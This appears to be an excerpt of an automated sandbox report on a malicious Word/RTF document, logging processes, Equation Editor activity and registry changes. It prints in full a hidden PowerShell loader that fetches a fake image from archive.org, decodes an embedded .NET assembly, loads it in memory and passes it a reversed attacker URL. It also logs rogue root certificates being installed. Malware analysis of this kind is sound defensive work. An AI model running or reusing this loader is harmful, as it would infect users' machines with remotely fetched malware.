                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE868 push eax; ret 2_2_005FE86B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE860 push eax; ret 2_2_005FE863
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE626 push eax; ret 2_2_005FE627
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE2D5 push edx; ret 2_2_005FE2D7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FDACE push eax; ret 2_2_005FDACF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE68D push eax; ret 2_2_005FE68F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE685 push eax; ret 2_2_005FE687
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FC75B push edx; ret 2_2_005FC7E7
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE34E push eax; ret 2_2_005FE34F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE378 push ecx; ret 2_2_005FE4BB
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FB96B push ebx; ret 2_2_005FB96F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FA966 push eax; ret 2_2_005FA967
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE30F push edx; ret 2_2_005FE31F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060170E push eax; ret 2_2_0060170F
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE326 push edx; ret 2_2_005FE327
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FA9CD push eax; ret 2_2_005FA9CF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FE7F2 push eax; ret 2_2_005FE85B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FC7EE push edx; ret 2_2_005FC7EF
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006015A2 push edx; ret 2_2_006015A3
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FCD90 push edx; ret 2_2_005FCD93
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005FCD8A push edx; ret 2_2_005FCD8B
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0060159A push edx; ret 2_2_0060159B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00252D62 pushfd ; ret 8_2_00252D71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00252D4D pushad ; ret 8_2_00252D61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00252DE9 push ebx; ret 8_2_00252DEA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0025234D pushad ; retf 8_2_00252361
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00252380 pushfd ; retf 8_2_00252389
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457186 push ecx; ret 9_2_00457199
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E55D push esi; ret 9_2_0045E566
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9

                Persistence and Installation Behavior

                barindex
                Installs new ROOT certificates
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Office drops RTF file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: ~WRD0000.tmp.0.drJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
